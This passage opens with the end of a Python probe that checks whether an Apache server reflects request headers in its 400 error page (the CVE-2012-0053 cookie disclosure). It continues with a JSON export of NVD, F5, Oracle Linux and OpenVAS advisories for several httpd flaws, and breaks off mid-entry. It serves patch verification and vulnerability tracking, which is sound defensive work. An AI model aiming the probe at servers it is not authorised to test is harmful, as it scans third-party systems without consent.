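PATCHED_RESPONSE = (
    b"HTTP/1.1 400 Bad Request\r\nServer: Apache\r\nContent-Type: text/html\r\n\r\n"
    b"<h1>Bad Request</h1><p>Size of a request header field exceeds server limit.<br /></p>"
)

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
        raw = send_probe(sys.argv[1], port)
    else:
        raw = VULNERABLE_RESPONSE
    print("header reflected" if header_reflected(raw) else "header not reflected")
```

Run it as `python3 probe.py <host> [port]`; with no arguments it evaluates the constructed vulnerable response. If a reverse proxy or WAF in front of httpd enforces its own header limit it will answer the 400 itself, so check the Server header of the response before drawing a conclusion about the backend; a reflected marker after the update means the fixed packages are not the ones actually serving.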
{"cve": [{"lastseen": "2018-01-09T15:22:17", "bulletinFamily": "NVD", "description": "Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.", "modified": "2018-01-08T21:29:01", "published": "2011-11-08T06:55:05", "id": "CVE-2011-3607", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3607", "title": "CVE-2011-3607", "type": "cve", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-18T11:55:02", "bulletinFamily": "NVD", "description": "scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.", "modified": "2018-01-17T21:29:01", "published": "2012-01-18T15:55:02", "id": "CVE-2012-0031", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0031", "title": "CVE-2012-0031", "type": "cve", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-29T12:17:20", "bulletinFamily": "NVD", "description": "The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers by using the HTTP/0.9 protocol with a malformed URI containing an initial @ (at sign) character. 
NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.", "modified": "2017-12-28T21:29:04", "published": "2011-11-29T23:05:58", "id": "CVE-2011-3639", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3639", "title": "CVE-2011-3639", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-01-18T11:55:02", "bulletinFamily": "NVD", "description": "protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.", "modified": "2018-01-17T21:29:02", "published": "2012-01-27T23:05:00", "id": "CVE-2012-0053", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0053", "title": "CVE-2012-0053", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "f5": [{"lastseen": "2017-12-19T06:45:37", "bulletinFamily": "software", "description": "\nF5 Product Development has assigned ID 377332 (BIG-IP), ID 474664 (Enterprise Manager), and ID 431234 (ARX) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth>) may list Heuristic H492118 on the **Diagnostics** >** Identified** > **Medium** screen. 
\n\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM | 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 | 11.2.0 - 11.6.0 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nBIG-IP AAM | None | 11.4.0 - 11.6.0 | None \nBIG-IP AFM | None | 11.3.0 - 11.6.0 | None \nBIG-IP Analytics | 11.0.0 - 11.1.0 | 11.2.0 - 11.6.0 | httpd (Configuration utility, iControl) \nBIG-IP APM | 11.0.0 - 11.1.0 \n10.1.0 - 10.2.4 | 11.2.0 - 11.6.0 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nBIG-IP ASM | 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 | 11.2.0 - 11.6.0 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nBIG-IP Edge Gateway | 11.0.0 - 11.1.0 \n10.1.0 - 10.2.4 | 11.2.0 - 11.3.0 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nBIG-IP GTM | 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 \n| 11.2.0 - 11.6.0 \n10.2.4 HF12 \n| httpd (Configuration utility, iControl) \nBIG-IP Link Controller | 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 | 11.2.0 - 11.6.0 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nBIG-IP PEM | None | 11.3.0 - 11.6.0 | None \nBIG-IP PSM | 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 | 11.2.0 - 11.4.1 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nBIG-IP WebAccelerator | 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 | 11.2.0 - 11.3.0 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nBIG-IP WOM | 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 | 11.2.0 - 11.3.0 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nARX | 6.2.0 - 6.4.0* | None | Management API (disabled by default) \nEnterprise Manager | 2.1.0 - 2.3.0 | 3.0.0 - 3.1.1 | httpd (Configuration utility, iControl) \nFirePass | None | 7.0.0 \n6.1.0 | None \nBIG-IQ Cloud | None | 4.0.0 - 4.5.0 | None 
\nBIG-IQ Device | None | 4.2.0 - 4.5.0 | None \nBIG-IQ Security | None | 4.0.0 - 4.5.0 | None \nBIG-IQ ADC | None | 4.5.0 | None \n \n* ARX is not vulnerable to CVE-2012-0021. \n\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists. \n \nF5 is responding to this vulnerability as determined by the parameters defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>). \n\n\nTo mitigate this vulnerability for ARX, do not enable the API functionality.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "modified": "2016-01-09T02:05:00", "published": "2014-12-04T09:32:00", "href": "https://support.f5.com/csp/article/K15889", "id": "F5:K15889", "title": "Apache HTTP server vulnerabilities CVE-2011-3368, CVE-2011-4317, CVE-2012-0021, CVE-2012-0031, and CVE-2012-0053", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-10-12T02:11:05", "bulletinFamily": "software", "description": "Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted 
HTTP request header, leading to a heap-based buffer overflow. ([CVE-2011-3607](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3607>))\n\nImpact\n\nA local attacker may be able to gain privileges by way of a **.htaccess** file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. The **Severity** values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nTo mitigate this vulnerability, you should permit management access to F5 products only over a secure network and restrict command line access for affected systems to the trusted users. 
For more information, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "modified": "2016-01-09T02:22:00", "published": "2015-07-23T22:22:00", "href": "https://support.f5.com/csp/article/K16907", "id": "F5:K16907", "title": "Apache HTTPD vulnerability CVE-2011-3607", "type": "f5", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:23:07", "bulletinFamily": "software", "description": "Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow. 
([CVE-2011-3607](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3607>))\n", "modified": "2015-12-22T00:00:00", "published": "2015-07-23T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/900/sol16907.html", "id": "SOL16907", "title": "SOL16907 - Apache HTTPD vulnerability CVE-2011-3607", "type": "f5", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:23:18", "bulletinFamily": "software", "description": " * [CVE-2011-3368](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3368>) \n \nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.\n * [CVE-2011-4317](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4317>) \n \nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. 
NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.\n * [CVE-2012-0021](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0021>) \n \nThe log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded MPM is used, does not properly handle a %{}C format string, which allows remote attackers to cause a denial of service (daemon crash) via a cookie that lacks both a name and a value.\n * [CVE-2012-0031](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0031>) \n \nscoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.\n * [CVE-2012-0053](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0053>) \n \nprotocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.\n", "modified": "2015-08-03T00:00:00", "published": "2014-12-03T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/800/sol15889.html", "id": "SOL15889", "title": "SOL15889 - Apache HTTP server vulnerabilities CVE-2011-3368, CVE-2011-4317, CVE-2012-0021, CVE-2012-0031, and CVE-2012-0053", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-26T17:22:50", "bulletinFamily": "software", "description": "Recommended Action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. 
If the table does not list any version in the column, then no upgrade candidate currently exists.\n\n**ARX**\n\nTo mitigate this vulnerability, do not enable the API functionality. \n\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL9502: BIG-IP hotfix matrix\n * SOL10322: FirePass hotfix matrix\n * SOL12766: ARX hotfix matrix\n * SOL3430: Installing FirePass hotfixes\n", "modified": "2015-08-07T00:00:00", "published": "2014-05-19T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15273.html", "id": "SOL15273", "title": "SOL15273 - Apache vulnerability CVE-2012-0053", "type": "f5", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-06-08T00:16:04", "bulletinFamily": "software", "description": "\nF5 Product Development has assigned ID 431234 (ARX) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 \n11.4.0 - 11.6.0| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 \n11.3.0 - 11.6.0| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 \n11.0.0 - 11.6.0| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 
10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 \n11.3.0 - 11.6.0| Not vulnerable| None \nBIG-IP PSM| None| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nARX| 6.0.0 - 6.4.0| None| Low| Management API (disabled by default) \nEnterprise Manager| None| 3.0.0 - 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 \n| Not vulnerable| None\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity **values published in the previous table. 
The **Severity **values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nTo mitigate this vulnerability for the ARX system, do not enable the API functionality.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 12.x)](<https://support.f5.com/csp/article/K13123>)\n * [K10025: Managing BIG-IP product hotfixes (10.x)](<https://support.f5.com/csp/article/K10025>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K10322: FirePass hotfix matrix](<https://support.f5.com/csp/article/K10322>)\n * [K12766: ARX hotfix matrix](<https://support.f5.com/csp/article/K12766>)\n * [K3430: Installing FirePass hotfixes](<https://support.f5.com/csp/article/K3430>)\n * [K6664: Obtaining and installing OPSWAT hotfixes](<https://support.f5.com/csp/article/K6664>)\n * [K10942: Installing OPSWAT hotfixes on BIG-IP APM systems](<https://support.f5.com/csp/article/K10942>)\n", "modified": "2016-01-09T02:32:00", "published": "2015-12-30T01:32:00", "id": "F5:K20979231", "href": "https://support.f5.com/csp/article/K20979231", "title": "Apache vulnerability CVE-2011-3639", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-27T05:23:16", "bulletinFamily": "software", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this 
vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. The **Severity** values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability for the ARX system, do not enable the API functionality.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL9502: BIG-IP hotfix matrix\n * SOL10322: FirePass hotfix matrix\n * SOL12766: ARX hotfix matrix\n * SOL3430: Installing FirePass hotfixes\n * SOL6664: Obtaining and installing OPSWAT hotfixes\n * SOL10942: Installing OPSWAT hotfixes on BIG-IP APM systems\n", "modified": "2015-12-29T00:00:00", "published": "2015-12-29T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/20/sol20979231.html", "id": "SOL20979231", "type": "f5", "title": "SOL20979231 - Apache vulnerability CVE-2011-3639", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:46:54", "bulletinFamily": "unix", "description": "[2.2.3-63.0.1.el5_8.1]\n- Fix mod_ssl always performing full renegotiation (orabug 12423387)\n- replace index.html with Oracle's index page oracle_index.html\n- update vstring and distro in specfile\n[2.2.3-63.1]\n- add security fixes for CVE-2012-0053, CVE-2012-0031, 
CVE-2011-3607 (#787596)\t\n- remove patch for CVE-2011-3638, obviated by fix for CVE-2011-3639", "modified": "2012-02-28T00:00:00", "published": "2012-02-28T00:00:00", "id": "ELSA-2012-0323", "href": "http://linux.oracle.com/errata/ELSA-2012-0323.html", "title": "httpd security update", "type": "oraclelinux", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T01:46:40", "bulletinFamily": "unix", "description": "[2.2.15-15.0.1.el6_2.1]\n- replace index.html with Oracle's index page oracle_index.html\n update vstring in specfile\n[2.2.15-15.1]\n- add security fixes for CVE-2011-4317, CVE-2012-0053, CVE-2012-0031,\n CVE-2011-3607 (#787598)\n- obviates fix for CVE-2011-3638, patch removed", "modified": "2012-02-13T00:00:00", "published": "2012-02-13T00:00:00", "id": "ELSA-2012-0128", "href": "http://linux.oracle.com/errata/ELSA-2012-0128.html", "title": "httpd security update", "type": "oraclelinux", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T01:44:34", "bulletinFamily": "unix", "description": "[2.2.15-26.0.1.el6]\n- replace index.html with Oracle's index page oracle_index.html\n update vstring in specfile\n[2.2.15-26]\n- htcacheclean: exit with code 4 also for 'restart' action (#805810)\n[2.2.15-25]\n- htcacheclean: exit with code 4 if nonprivileged user runs initscript (#805810)\n- rotatelogs: omit the second arg when invoking a post-rotate program (#876923)\n[2.2.15-24]\n- mod_ssl: improved patch for mod_nss fallback (w/mharmsen, #805720)\n[2.2.15-23]\n- mod_log_config: fix cookie parsing substring mismatch (#867268)\n[2.2.15-22]\n- mod_cache: fix header merging for 304 case, thanks to Roy Badami (#868283)\n- mod_cache: fix handling of 304 responses (#868253)\n[2.2.15-21]\n- mod_proxy_ajp: ignore flushing if headers have not been sent (#853160)\n- mod_proxy_ajp: do not mark worker in error state when one request\n timeouts 
(#864317)\n- mod_ssl: do not run post script if all files are already created (#752618)\n[2.2.15-20]\n- add htcacheclean init script (Jan Kaluza, #805810)\n[2.2.15-19]\n- mod_ssl: fall back on another module's proxy hook if mod_ssl proxy\n is not configured. (#805720)\n[2.2.15-18]\n- add security fix for CVE-2012-2687 (#850794)\n[2.2.15-17]\n- mod_proxy: allow change BalancerMember state in web interface (#748400)\n- mod_proxy: Tone down 'worker [URL] used by another worker' warning (#787247)\n- mod_proxy: add support for 'failonstatus' option (#824571)\n- mod_proxy: avoid DNS lookup on hostname from request URI if\n ProxyRemote* is configured (#837086)\n- rotatelogs: create files even if they are empty (#757739)\n- rotatelogs: option to rotate files into a custom location (#757735)\n- rotatelogs: add support for -L option (#838493)\n- fix handling of long chunk-line (#842376)\n- add server aliases to 'httpd -S' output (#833092)\n- omit %posttrans daemon restart if\n /etc/sysconfig/httpd-disable-posttrans exists (#833064)\n- mod_ldap: treat LDAP_UNAVAILABLE as a transient error (#829689)\n- ab: fix double free when SSL request fails in verbose mode (#837613)\n- mod_cache: do not cache partial results (#822587)\n- mod_ldap: add LDAPReferrals directive alias (#796958)\n- mod_ssl: add _userID DN variable suffix for NID_userId (#842375)\n- mod_ssl: fix test for missing decrypted private keys, and ensure that\n the keypair matches (#848954)\n- mod_authnz_ldap: set AUTHORIZE_* variables in LDAP authorization (#828896)\n- relax checks for status-line validity (#853348)\n[2.2.15-16]\n- add security fixes for CVE-2011-4317, CVE-2012-0053, CVE-2012-0031,\n CVE-2011-3607 (#787599)\n- obviates fix for CVE-2011-3638, patch removed", "modified": "2013-02-22T00:00:00", "published": "2013-02-22T00:00:00", "id": "ELSA-2013-0512", "href": "http://linux.oracle.com/errata/ELSA-2013-0512.html", "title": "httpd security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": 
{"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "openvas": [{"lastseen": "2018-10-02T14:35:42", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120253", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120253", "title": "Amazon Linux Local Check: ALAS-2012-46", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2012-46.nasl 6578 2017-07-06 13:44:33Z cfischer$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120253\");\n script_version(\"$Revision: 11711 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:21:35 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 14:30:57 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: ALAS-2012-46\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in httpd. Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update httpd to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2012-46.html\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.22~1.23.amzn1\", rls:\"AMAZON\")) != NULL) 
{\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.22~1.23.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.22~1.23.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.22~1.23.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.22~1.23.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-28T18:24:26", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2012-0128", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123992", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123992", "title": "Oracle Linux Local Check: ELSA-2012-0128", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2012-0128.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, 